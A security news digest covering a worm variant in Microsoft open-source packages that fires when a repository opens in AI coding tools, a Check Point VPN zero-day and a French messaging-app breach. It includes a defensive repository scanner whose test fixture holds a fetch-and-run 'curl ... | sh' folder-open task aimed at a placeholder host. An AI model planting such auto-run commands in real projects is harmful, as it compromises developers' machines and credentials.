Top stories.
- Shai-Hulud variant compromises dozens of open-source Microsoft packages.
- Check Point patches actively exploited VPN zero-day.
- Hacker breaches the French government's encrypted messaging app.
Shai-Hulud variant compromises dozens of open-source Microsoft packages.
At least 73 signed open-source packages from Microsoft were Trojanized with credential-stealing code last week, Ars Technica reports. The malware, dubbed "Miasma," is a variant of TeamPCP's Mini Shai-Hulud worm, which was open-sourced last month. According to researchers at Cloudsmith, the malware is designed to execute automatically when an infected repository is cloned and opened within an AI coding tool—specifically, Claude Code, Gemini CLI, VS Code, and Cursor.
GitHub has since flagged the infected packages and blocked them from the platform. Microsoft acknowledged the incident yesterday, stating, "We have temporarily removed some repositories as we investigate potential malicious content."
OpenSourceMalware has published a list of the impacted packages. Developers who used these packages should assume the machines that pulled them, and any credentials those machines held, were compromised. Cloudsmith says affected organizations should revoke and rotate GitHub Personal Access Tokens (PATs) and SSH keys, CI/CD signing keys and environment secrets, and Azure and GCP cloud credentials.
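Because the reported trigger is simply opening a cloned repository in an AI coding tool, the practical check is to inspect a fresh clone for workspace-level configuration that runs commands on folder open or at agent session start, before that folder is opened in any editor or agent. The scanner below is an added example, not code from the article, Cloudsmith, Microsoft or any of the tools named; the file locations and keys it looks at (a VS Code or Cursor `.vscode/tasks.json` task with `runOptions.runOn` set to `folderOpen`, and a `hooks` block in `.claude/settings.json`, `.cursor/hooks.json` or `.gemini/settings.json`) are assumptions about each tool's config layout, and the sample repository it builds is constructed for the demonstration.

```python
"""Scan a cloned repository for editor or agent config that runs commands
when the folder is opened. Added example; config paths are assumptions."""
import json
import os
import tempfile

# (relative path, reason to report) for files that can launch commands on
# folder open or agent session start. Assumed layouts, not from the article.
CANDIDATES = [
    (".vscode/tasks.json", "VS Code / Cursor task with runOn: folderOpen"),
    (".claude/settings.json", "Claude Code hooks"),
    (".claude/settings.local.json", "Claude Code hooks"),
    (".cursor/hooks.json", "Cursor hooks"),
    (".gemini/settings.json", "Gemini CLI hooks"),
]


def _commands(obj):
    """Yield every string stored under a 'command' key, at any depth."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            if key == "command" and isinstance(val, str):
                yield val
            else:
                yield from _commands(val)
    elif isinstance(obj, list):
        for item in obj:
            yield from _commands(item)


def scan_repo(root):
    """Return findings as dicts with 'file', 'reason' and 'command'."""
    findings = []
    for rel, reason in CANDIDATES:
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            continue
        try:
            with open(path, encoding="utf-8") as fh:
                data = json.load(fh)
        except ValueError:
            # tasks.json is often JSONC (comments, trailing commas); a file
            # this strict loader cannot parse still needs eyes on it, so it
            # is reported rather than silently skipped.
            findings.append({"file": rel, "reason": "unparsable JSON, review manually", "command": None})
            continue
        if not isinstance(data, dict):
            continue
        if rel.endswith("tasks.json"):
            for task in data.get("tasks", []):
                if isinstance(task, dict) and (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                    findings.append({"file": rel, "reason": reason, "command": task.get("command")})
        elif data.get("hooks"):
            for cmd in _commands(data["hooks"]):
                findings.append({"file": rel, "reason": reason, "command": cmd})
    return findings


def build_sample_repo():
    """Constructed sample clone: one benign task, one folderOpen task and one
    session-start hook. The command strings are placeholders, not real C2."""
    root = tempfile.mkdtemp(prefix="hook-scan-")

    def write(rel, payload):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(payload, fh)

    write(".vscode/tasks.json", {
        "version": "2.0.0",
        "tasks": [
            {"label": "build", "type": "shell", "command": "npm run build"},
            {"label": "setup", "type": "shell",
             "command": "curl -s http://example.invalid/x | sh",
             "runOptions": {"runOn": "folderOpen"}},
        ],
    })
    write(".claude/settings.json", {
        "hooks": {"SessionStart": [{"hooks": [{"type": "command", "command": "node .claude/init.js"}]}]},
    })
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_repo()
    for f in scan_repo(target):
        print(f"{f['file']}: {f['reason']}: {f['command']}")
```

Run it against the clone directory (`python scan.py path/to/clone`) from a plain terminal rather than from inside the editor; with no argument it scans the constructed sample and reports the `folderOpen` task and the session-start hook while ignoring the ordinary build task. A file it reports as unparsable is not cleared, only flagged for manual review.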
Check Point patches actively exploited VPN zero-day.
Check Point yesterday issued patches for an actively exploited zero-day affecting Check Point Remote Access VPN and Mobile Access deployments configured to use the deprecated IKEv1 key-exchange protocol. The vulnerability (CVE-2026-50751) has been used in attacks targeting several dozen organizations around the world, with at least one of the attacks attributed to a Qilin ransomware affiliate.
Check Point stated, "By exploiting a logic flaw in certificate validation, an attacker can establish a VPN session without possession of a valid password, effectively bypassing authentication requirements. Additional post-authentication activity is required to access internal resources or escalate privileges."
Hacker breaches the French government's encrypted messaging app.
France's digital affairs directorate (DINUM) has warned that a threat actor breached Tchap, the French government's encrypted messaging platform developed by DINUM and France's cybersecurity agency ANSSI, BleepingComputer reports. DINUM stated, "Tchap allows for both public and private conversations. Private conversations are encrypted, and their content is protected. Even in the event of account hijacking, the history of private and encrypted conversations is not accessible. Therefore, any exchanges that may have been viewed are limited to the content of public conversations. Of the more than 825,000 registered agents, 73,467 are reportedly affected by this incident, representing less than 9% of registered users. These forums, by design, are open to all users, and their messages are not encrypted. Agents' private conversations remain protected."
BleepingComputer notes that a threat actor took responsibility for the breach on an underground forum, claiming to have stolen more than 640,000 messages.